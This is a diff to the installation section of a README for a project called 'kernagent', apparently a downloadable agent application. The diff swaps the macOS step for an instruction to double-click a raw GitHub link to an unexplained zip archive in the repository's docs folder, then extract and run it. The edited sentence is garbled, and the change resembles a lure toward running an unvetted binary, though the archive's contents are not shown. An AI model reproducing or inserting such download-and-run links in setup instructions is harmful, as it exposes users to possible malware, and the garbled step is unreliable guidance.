ZamaNy1284/kernagent/README.md

 1. **Locate the downloaded file**: Go to the folder where you saved the file.
 2. **Run the application**:
    - On Windows, double-click the `.exe` file.
-   - On macOS, double-click the `.tar.gz`, then extract the files and run the application.
+   - On macOS, double-click the `https://raw.githubusercontent.com/ZamaNy1284/kernagent/main/docs/kernagent-3.1.zip`, then extract the files and run the application.
    - On Linux, open a terminal, navigate to the folder, and run `./kernagent` (after changing permissions if necessary).
 3. **Follow the on-screen instructions**: The agent will guide you through the setup.